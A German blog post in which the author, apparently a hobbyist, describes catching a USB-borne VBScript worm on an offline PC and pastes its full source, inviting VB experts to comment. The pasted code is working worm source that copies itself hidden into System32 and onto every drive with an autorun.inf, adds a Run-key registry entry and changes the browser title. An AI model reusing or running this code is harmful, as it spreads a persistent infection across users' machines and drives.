Ja Leute, jetzt ist es passiert, der Fux hat sich ‘nen Virus eingefangen!
Das ist etwas ganz besonderes für mich, meinen letzten Virus hatte ich irgendwann im letzten Jahrtausend an meinem alten Amiga 500 
Aber heute ist es dann passiert, zum “Glück” an einem nicht am Netz hängenden Rechner kam mittels eines USB-Sticks ein leicht lästiger Plagegeist angeschlichen.
Das Kind kommt in Form zweier Dateien daher: Einer autorun.inf und einer <rechnername>.vbs und SCHEINT nichts anderes zu machen als sich selber immer wieder zu starten (renitentes kleines Viecherl) und den Titel des IE in “Hacked by <Rechnername>” zu ändern.
Auch der “Quellcode” sieht eher nach Nerv- denn nach Schadsoftware aus, ich vermute mal als Author ein 12jähriges Scriptkiddie, das gerade die ersten 2 Kapitel seines VB-Buches hinter sich hat.
Damit wir alle herzlich lachen können häng ich den Code mal rein, evtl. kann ja der ein oder andere VisualBasic-Experte mal einen Blick drauf werfen und seine Meinung kund tun, ich selber “spreche” kein VB, aber nach allem was ich sehe ist das Teil nicht wirklich schädlich.
‘Mutation of Trojan virus.
‘My name is DORFL.vbs
On error resume next
Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname
Set fs = createobject("Scripting.FileSystemObject")
Set wn = WScript.CreateObject("WScript.Network")
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
newname = wn.ComputerName & ".vbs"
rgname = Replace(newname,".vbs","")
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe DORFL.vbs"
dim text,size
size = mf.size
check = mf.drive.drivetype
Set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
Loop
mysource=Replace(mysource,oldname,newname)
do
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 32
Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true)
tf.write mysource
tf.close
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 39
For each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" Then
Set tf=fs.getfile(flashdrive.path &"\DORFL.vbs")
tf.attributes =32
Set tf=fs.createtextfile(flashdrive.path &"\DORFL.vbs",2,true)
tf.write mysource
tf.close
Set tf=fs.getfile(flashdrive.path &"\DORFL.vbs")
tf.attributes =39
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
End If
next
Set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname, ".vbs","")
if check <> 1 then
Wscript.sleep 120000
End if
loop while check<>1
Set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
Es handelt sich übrigens um einen HTML/Rce.Gen Virus, falls das interessiert
lat. Vulpes vulpes geekensis
männlicher Angehöriger einer sonnen-lichtscheuen, pinguinliebenden Spezies
